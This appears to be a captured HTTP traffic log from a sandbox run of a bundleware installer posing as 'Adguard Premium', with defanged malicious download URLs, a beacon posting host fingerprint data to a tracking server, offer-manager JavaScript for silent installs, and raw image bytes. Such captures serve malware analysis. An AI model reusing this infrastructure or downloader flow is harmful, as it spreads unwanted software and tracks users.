installer.png.n1=Setup__2140_il11.exe.b1=am.c1=2140-sevenzip.s1=0.m1=0
.d1=0.t2=dl.u2=hXXp://get.tenesspercusseu.bid/?affId=1006&appTitle=Adg
uard%20Premium%20v6.1.245.1212%20&s1=2273&s2=10277909&setupName=
cpSetup&appVersion=2.92&instId=11&exe=1.n2=cpSetup.exe.b2=cp.c2=sevenz
ip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://gal.cleanthessel.bid/stub_maker_uk
2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premiu
m v6.1.245.1212 .n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d
3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle
=to run your file.itype=silent...



POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=27B033A7049795957AADB08026A40A2E&Sysid1=27B033A7049795957AADB08026A40A2E&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il11.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il11&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA1AA==&netfs=3&ts=1476401533&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 13 Oct 2016 23:32:02 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
  var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity',
 'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
;base href="hXXp://VVV.millesimalnonremuneration.site:80/index.php" /&
gt;.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadin
gdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />    
    <script type="text/javascript" src="hXXp://cdn1.leadingdownload
.com/V38/amipb.js"></script>.        <script type="text/ja
vascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_ins
taller.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..  
          var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_a
dditional_offer_list = '1';.            var g_finish_install_button = 
'1';.            var g_popup_install_all = '1';.            var g_eula
 = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbG
UgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcg
dGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW
5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwg
<<< skipped >>>

POST /finalize.php HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Content-Length: 352
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l11&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_SputnikSearch=1&r_Xtex=5&r_AmigoBrowser=1&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&SputnikSearch=1&Xtex=1&AmigoBrowser=1&YesSearches=4
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 13 Oct 2016 23:32:03 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 4533
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>DownloadManagerModern</com
ps><short_name>DownloadManagerModern</short_name><mu
st_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZ
XJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9
pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyL
nBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CQoJCQk8YSBocmVmPSJodHR
wOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFua
yIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI UHJpdmFjeSBQb2xpY3k8L2E PGJyIC8 CgkJCTx
hIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdld
D0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSB
ocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhc
mdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTw
vZGl2PgoJPC9kaXY Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhb
WlfZGVjX2RpdiI CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN
0YWxsZXI8L2I PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvb
nRpbnVlIGluc3RhbGxpbmcgeW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQ
gYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb
2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDogMTMwcHgiPiAKCQk8YnIgLz4KCQk
JPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUiIHN0eWxlPSJ3aWR0a
DogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9wOiA
<<< skipped >>>

GET /Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.millesimalnonremuneration.site
Connection: Keep-Alive


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Thu, 13 Oct 2016 23:32:04 GMT
ETag: "24be9-6048-53ebf8fd5d219"
Last-Modified: Thu, 13 Oct 2016 14:02:36 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 24648
Connection: keep-alive
.PNG........IHDR...x.................pHYs...............9.iTXtXML:com.
adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&
gt;.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5
-c021 79.155772, 2014/01/13-19:44:00        ">.   <rdf:RDF xmlns
:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">.      <rdf:D
escription rdf:about="".            xmlns:xmpMM="hXXp://ns.adobe.com/x
ap/1.0/mm/".            xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType
/ResourceRef#".            xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sT
ype/ResourceEvent#".            xmlns:xmp="hXXp://ns.adobe.com/xap/1.0
/".            xmlns:dc="hXXp://purl.org/dc/elements/1.1/".           
 xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/".            xmln
s:tiff="hXXp://ns.adobe.com/tiff/1.0/".            xmlns:exif="hXXp://
ns.adobe.com/exif/1.0/">.         <xmpMM:OriginalDocumentID>x
mp.did:43BEE2C7A44CE511B0B89F8BC58050CC</xmpMM:OriginalDocumentID&g
t;.         <xmpMM:DocumentID>xmp.did:EE41BE59231A11E6A47DD442F3
889C91</xmpMM:DocumentID>.         <xmpMM:InstanceID>xmp.i
id:398f154b-ec32-cd42-9b89-c528f787f221</xmpMM:InstanceID>.     
    <xmpMM:DerivedFrom rdf:parseType="Resource">.            <
;stRef:instanceID>xmp.iid:50F438BC1623E611B8B2FB070BF1D8F5</stRe
f:instanceID>.            <stRef:documentID>xmp.did:43BEE2C7A
44CE511B0B89F8BC58050CC</stRef:documentID>.         </xmpMM:D
erivedFrom>.         <xmpMM:History>.            <rdf:
<<< skipped >>>


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Content-Disposition: attachment; filename="main.css"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gklVyNllSg8_KvLMQEhEn90HgMiPqqmE5s05UaNH3MzzESUyBCVZAg==
body {..    font-size:10px;.    background:#eaeaea;.    font-family: A
rial;.    margin: 0;.    padding: 0;.    color:#000000;        .}..div
, span, textarea {.    cursor: default;.}..a, a span, a div {.    curs
or: pointer;.}../* whole screen styles   */..ami-wrapper{.   backgroun
d : none no-repeat scroll 0 0 #eaeaea;.   border:2px solid #989898; .}
../* moddle element */..#ami-body.{..position: relative;.    padding-l
eft:27;.    padding-right:27;.}...bottom-line{.    background-color:#5
cafd4;.    height:45px;.    width:100%;.}..table {.    border-collapse
: collapse;.    margin: 0 ;.    padding: 0;.    font-size:10px;.}..tex
tarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 
5px;.}...textarea1{.    background:#ffffff;.    color:#000000;.    hei
ght:100%;.    width:100%;.    overflow-x:hidden;.}..td{.    padding: 0
px;.}../* footer and footer buttons */...bottom-holder{.    background
-image:url('footer_img.png');.    background-repeat:repeat-x;.    heig
ht:59px;.    position:absolute;.    bottom:0px;.    padding-left:20px;
.    padding-right:20px;.}...#btnNext{.    background:  url('next.gif'
) no-repeat;.}.#btnCancel{.    background:  url('cancel.gif') no-repea
t;.}../* Use for cancle with no popup !!! */.#btnBack{.    background:
  url('cancel1.gif') no-repeat;.}..#btnDecline{.    background:  url('
decline.gif') no-repeat;.}..#btnAccept{.    background:  url('accept.g
if') no-repeat;.}..#btnSkip{.    background:  url('skip.gif') no-repea
t;.}...btn-finish-install{.    background:  url('finish.gif') no-r
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Content-Disposition: attachment; filename="footer_img.png"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qA0denXxtnFTEM-hL1yHSjWydSRh7-Rxsy8ipZjv_einpCVwC0sZdQ==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8
E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397D
FE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B
910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
 <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.
]l....IEND.B`.....


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Content-Disposition: attachment; filename="skip.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _0AZPB3lATerNEsPbrxxNUgdgP8vPRhhkvtOwxn0ZX1kP-re9EZ7Jw==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,....e........|"E......*\......?...)....3j...... Cb
.....R...\[email protected]....>...C...:P.J.J.*U.X.:....
..`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.
3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f.
.$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........
f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......
D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x....
...F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|
...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.
4.I...R.....m$.A............".T..%.pPC./[email protected].".......!.%......v.1..
.4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Content-Disposition: attachment; filename="next.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: sjV6WD3viZQmcWQh9Qhj1X-OwGR0IVWryXE95p-sh8kafkDWXwspDw==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Content-Disposition: attachment; filename="finish.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12925
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lEUF73cxU19XaYPhAb8TtQknWohj3625jUkX1fQQjfFJ4NCUVGai4w==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>


GET /V38/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 72267
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:35:19 GMT
Last-Modified: Thu, 30 Jun 2016 11:47:44 GMT
ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 13197
X-Cache: Hit from cloudfront
Via: 1.1 f613263709af023d6779bef4754ac354.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bVpnM7Lb7Qx1__lOojIXna28CxhXvZZAm-h0WJXpDQAi4-8BOJ05DA==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();.var
 g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var
 g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = 
[];..var g_disable_updater = false;..//in the version we tests updater
 task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !=
= 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterT
askCreated = false;..function LogMessage(message) {.    try {.        
g_ami.Log(message);.    }.    catch (excpt) {.    }.}..function IsDecl
ined(name) {.    var declined = 0;.    for (var i = 0; i < g_remove
dComps.length; i  ) {.        if (g_removedComps[i] == name) {.       
     declined = 1;.            break;.        }.    }.    return decli
ned;.}..function UpdateSkipStatus(sn) {.    if (g_testa && !ArrayConta
ins(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayCont
ains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {.        if (g_
testa.constructor != Array || ArrayContains(g_testa, sn)) {.          
  g_ami.WriteProfileString(g_testf, '', sn, 'S');.            g_report
edComps.push(sn);.        }.    }.}..function ShortNameFromName(name) 
{.    for (c = 0; c < g_comps.length; c  ) {.        if (g_comps[c]
.name == name) {.            return g_comps[c].sn;.        }.    }.   
 return name;.}..function UpdateComponentsStatus() {.    LogMessage('U
pdateComponentsStatus function started');.    for (var j = 0; j < g
_possibleComps.length; j  ) {..        if (g_possibleComps[j].sn =
<<< skipped >>>


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Content-Disposition: attachment; filename="cancel1.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12927
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MbiDm79emkRGEr0nRndqyai0ft1x-V4AXJKOieWgEpCA6lCKH_VHaw==
[email protected]*.-<.AC.K=.F>.H'. ;.B,./=.E)./)[email protected]=.D=.D?.GC.M
>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)&
gt;.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).
1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..
,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&
.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.
A<.G4.9 .05.<C.F6.;;[email protected]".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A
 ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp...................
......................................................................
......................................................................
......................................................................
......................................................................
.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTcz
kc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP C
ore 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF x
mlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Des
cription rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:x
mpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.co
m/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xm
pMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Content-Disposition: attachment; filename="cancel.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
